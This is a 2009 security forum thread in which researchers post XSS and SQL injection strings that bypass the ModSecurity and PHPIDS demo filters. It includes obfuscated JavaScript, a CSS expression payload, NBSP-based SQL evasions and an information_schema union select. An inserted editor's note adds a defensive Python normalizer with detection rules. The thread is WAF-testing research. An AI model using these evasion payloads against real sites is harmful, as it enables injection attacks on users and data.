Sla.ckers.org
Modsecurity + phpids
Posted by: Gareth Heyes
Date: November 12, 2009 09:07AM

Let the fun begin! :)

http://bit.ly/2hHTsX


OOOOPPPSSS lol
http://tinyurl.com/yzbxz5v

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 11/12/2009 09:23AM by Gareth Heyes.

Re: Modsecurity + phpids
Posted by: rvdh
Date: November 12, 2009 10:11AM

lol, nice 1

Re: Modsecurity + phpids
Posted by: thornmaker
Date: November 12, 2009 01:50PM

I developed this while listening to Ryan's OWASP talk on mod security and the new demo page: http://pastebin.ca/1668658

It doesn't work if you pass it in as a GET param (new line chars trigger the mod security response splitting filter), so cut/paste it into the text box.

Interesting notes: I got it working in php-ids first. When I tried it on the mod security demo page, I was triggering one filter that php-ids wasn't. A simple tweak to the injection and it bypassed both.

injection is:

__=''
$$$$=__+'t(0),1'
$$$=__
$$=__+'e'
__=__+'__par'
_=$$+'val'
x1=1+$$$+[]
z=$$+'nt__'
x1=x1[__+z]
x1=x1[_]
y=x1('aler'+$$$$)
x1(y)
'abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_'

Re: Modsecurity + phpids
Posted by: brianrectanus
Date: November 13, 2009 01:02PM

Working on a fix for these types of attacks. Admittedly a bit lame at the moment, but stopping this attack and similar ones.

-B

Re: Modsecurity + phpids
Posted by: rcbarnett
Date: November 13, 2009 02:41PM

Yeah, this is reinforcing what we already knew after discussing the translation of the default_filters.xml data into ModSecurity's rules language with Mario. While we have converted some of the normalization functions from the Converter.php code into ModSecurity SecRules, there are still some that we are missing (namely the conversion of various quotes into just double-quotes) and thus some of the signatures aren't matching in the CRS demo when they are in the phpids smoketest page. The other missing component is the Centrifuge detection which is the other category of items that our demo has missed and phpids has caught thus far.

What I believe needs to be done is to get the Converter.php code ported over to a Lua script that can be used in ModSecurity.

Anyone want to tackle this project??? :)

Re: Modsecurity + phpids
Posted by: Gareth Heyes
Date: November 17, 2009 08:52AM

This bypasses the modsecurity rules:-

<div/style=`-:expressio&#x5c&#x36&#x65(\u006&#x34;omai&#x6e=x)` x=modsecurity.org>

changes document.domain to modsecurity.org

I'd bypass the PHPIDS rule as well, but seeing as the demo doesn't display it or tell me which one it is, I couldn't be bothered.

Explanation:-
- I used css escapes for the "n" along with malformed hex html entities
- For the domain assignment I use unicode js escapes with hex entity encoding
- x is obtained from the html attribute and automatically is in scope of the expression
- `` are used to bypass style injection rules




Edited 1 time(s). Last edit at 11/17/2009 08:57AM by Gareth Heyes.

Re: Modsecurity + phpids
Posted by: lightos
Date: November 19, 2009 03:23PM

mysql''x'and'1'like'1
mysql''x'and'1'like'0

Re: Modsecurity + phpids
Posted by: lightos
Date: November 21, 2009 07:13AM

It is possible to bypass a lot of rules using NBSP (NO-BREAK SPACE U+00A0), for example:

http://www.modsecurity.org/demo/phpids?test=%27%a0and%201%20%a0=%a0%272



Edited 1 time(s). Last edit at 11/21/2009 07:15AM by lightos.

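Editor's note, added to this thread as an illustration and not code from PHPIDS, ModSecurity or any of the posters above: rcbarnett's post says the CRS demo was missing some of the Converter.php normalization steps (folding the various quote characters into double quotes), Gareth Heyes's post lists the encoding layers his payload stacks (malformed hex HTML entities without a terminating semicolon, CSS hex escapes, JavaScript unicode escapes, backticks as attribute quotes), and lightos's post shows that a NO-BREAK SPACE slips past rules that only know ASCII whitespace. The Python below is a constructed, simplified normalization pipeline in that spirit: it peels the encoding layers until nothing changes, folds exotic whitespace and quote characters to one canonical form, and then runs a handful of toy rules on the raw and on the normalized input so the difference is visible. The quote and whitespace character sets, the rule patterns and the rule names are assumptions for illustration, not the PHPIDS or CRS rule sets. The three sample inputs are the ones posted in this thread.

```python
"""Constructed normalization pipeline (not PHPIDS Converter.php, not ModSecurity).

Decodes malformed HTML numeric entities, CSS hex escapes and JS escapes to a
fixpoint, folds whitespace and quote variants, then runs toy rules on both the
raw and the normalized input. Character sets, rules and names are assumptions.
"""
import re
from urllib.parse import unquote_to_bytes

# Quote-like characters folded to one canonical double quote (assumed set).
QUOTE_CHARS = "'`\u2018\u2019\u201a\u201c\u201d\u201e"
# Exotic whitespace folded to an ASCII space; U+00A0 is the NBSP from the thread.
SPACE_CHARS = ("\u00a0\u1680\u2000\u2001\u2002\u2003\u2004\u2005\u2006\u2007"
               "\u2008\u2009\u200a\u2028\u2029\u202f\u205f\u3000\t\r\n\x0b\x0c")

# Numeric HTML entities with the terminating ';' optional (the malformed form
# browsers still accept and that the thread's payloads rely on).
HTML_HEX = re.compile(r"&#[xX]([0-9a-fA-F]{1,6});?")
HTML_DEC = re.compile(r"&#([0-9]{1,7});?")
# CSS hex escape: backslash, 1-6 hex digits, optional single whitespace.
CSS_ESC = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\n]?")
# JavaScript \uXXXX and \xXX escapes.
JS_ESC = re.compile(r"\\(?:u([0-9a-fA-F]{4})|x([0-9a-fA-F]{2}))")


def _safe_chr(code):
    """chr() that tolerates out-of-range code points instead of raising."""
    try:
        return chr(code)
    except (ValueError, OverflowError):
        return "\ufffd"


def decode_html_entities(s):
    s = HTML_HEX.sub(lambda m: _safe_chr(int(m.group(1), 16)), s)
    return HTML_DEC.sub(lambda m: _safe_chr(int(m.group(1), 10)), s)


def decode_css_escapes(s):
    return CSS_ESC.sub(lambda m: _safe_chr(int(m.group(1), 16)), s)


def decode_js_escapes(s):
    return JS_ESC.sub(lambda m: _safe_chr(int(m.group(1) or m.group(2), 16)), s)


def fold_whitespace(s):
    s = s.translate({ord(c): " " for c in SPACE_CHARS})
    return re.sub(r" {2,}", " ", s)


def fold_quotes(s):
    return s.translate({ord(c): '"' for c in QUOTE_CHARS})


def url_decode(s):
    # Decode as latin-1 so a lone high byte such as %a0 survives as U+00A0
    # instead of failing as invalid UTF-8.
    return unquote_to_bytes(s).decode("latin-1")


def normalize(raw, max_rounds=5):
    """Peel encoding layers until a fixpoint, then fold whitespace and quotes."""
    s = url_decode(raw)
    for _ in range(max_rounds):
        before = s
        s = decode_js_escapes(decode_css_escapes(decode_html_entities(s)))
        if s == before:
            break
    return fold_quotes(fold_whitespace(s))


# Toy rules. re.ASCII makes \s and \b ASCII-only, the way a PCRE rule compiled
# without Unicode properties sees them, so U+00A0 is not whitespace to a rule.
FLAGS = re.IGNORECASE | re.ASCII
RULES = {
    "css-expression": re.compile(r"expression\s*\(", FLAGS),
    "sql-tautology": re.compile(r"\b(?:and|or|xor)\s+\d+\s*=\s*", FLAGS),
    "sql-quoted-keyword": re.compile(r'"\s*(?:and|or|xor|like|having)\s*"', FLAGS),
}


def matched_rules(s):
    return sorted(name for name, rx in RULES.items() if rx.search(s))


def inspect(raw):
    """Return (rules hit on the URL-decoded raw input, rules hit after normalization)."""
    return matched_rules(url_decode(raw)), matched_rules(normalize(raw))


if __name__ == "__main__":
    samples = [  # the three inputs posted in this thread
        "<div/style=`-:expressio&#x5c&#x36&#x65(\\u006&#x34;omai&#x6e=x)` x=modsecurity.org>",
        "%27%a0and%201%20%a0=%a0%272",
        "mysql''x'and'1'like'1",
    ]
    for raw in samples:
        print(repr(normalize(raw)), inspect(raw))
```

Two design points worth noting. The decode loop runs to a fixpoint with a round cap, because an entity can decode into another escape (and double-encoded input is a common way to get past a single-pass decoder), while the cap keeps a crafted input from making the normalizer spin. The rules are compiled with `re.ASCII` on purpose: with Python's default Unicode semantics `\s` already matches U+00A0, which would hide exactly the gap lightos's example exposes in engines whose `\s` is ASCII-only.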
Re: Modsecurity + phpids
Posted by: lightos
Date: November 23, 2009 09:18PM

'|' 1
' and 1.^.1/' 1
' and 1.^' 2

Re: Modsecurity + phpids
Posted by: Gareth Heyes
Date: November 24, 2009 06:22AM

Modsecurity + phpids

VBScript.Encode:&#x23&#x40&#x7e&#x5e;CAAAAA&#x3d&#x3d&#x5cko&#x24K6,FoQIAAA&#x3d&#x3d&#x5e&#x23&#x7e&#x40

:D


Re: Modsecurity + phpids
Posted by: lightos
Date: November 25, 2009 03:33AM

sql'xor' 1
sql'having~! '

Re: Modsecurity + phpids
Posted by: lightos
Date: November 25, 2009 11:39PM

'group by'1'having'1

null''null'|locate(uname, 'lightos') and '1

'''and~1/null||null-1 or uname sounds like 'lightos

2a'-1.and'0'|find_in_set(uname, 'lightos' ) and '1

'-1-0 union select-1,(select `table_name` from `information_schema`.tables limit 1) and '1 (phpids only)



Edited 2 time(s). Last edit at 11/26/2009 06:22AM by lightos.

Re: Modsecurity + phpids
Posted by: Reiners
Date: November 26, 2009 09:12AM

nice ones =)

Re: Modsecurity + phpids
Posted by: Gareth Heyes
Date: April 22, 2010 08:22AM

I declare this thread pointless and no fun. Modsecurity is snake oil


Re: Modsecurity + phpids
Posted by: brianrectanus
Date: April 22, 2010 02:38PM

Yeah, the format of the demo is not ideal. It needs some work. The demo does not really test ModSecurity very well, but rather tests the core rule set. The better the rule set, the better the demo would be. We cannot tailor the rule set for the demo that does not actually protect anything.

Snake oil though? I think that is pushing it a bit. I guess, though, you can call any WAF/IDS/IPS with just an on/off switch snake oil and that is pretty much what demos are. So I'll give you that - demos like this are snake oil, but that does not mean the product being demoed is. Turning what we have in the demo on in a real site would be full of false positives as the demo is designed to be as generic as possible. However, in the real world you would have real apps installed behind ModSecurity and more targeted rules. You would not care so much for some of the crazy encodings against technology that is not in use anyhow.

Additionally, ModSecurity is not all about blocking, but also about auditing and visibility into your app. People are way too into blocking right now and a WAF/IPS that does block will need to be tuned to avoid FP to avoid loss of revenue, etc. Nothing is going to be 100% foolproof and that keeps you employed, so be happy there ;)

We put the demo up because people asked for it. It is not perfect, but it does help tune the core rule set. In hindsight maybe the demo was a bad idea as it does not help that much. Something more fun would be a challenge against a real website. I would not hold my breath for something like that, though, as vendors get berated for not putting up demos, then when they do they get berated for that, too, so why should a vendor bother with it? It is just added maintenance and time.

-B
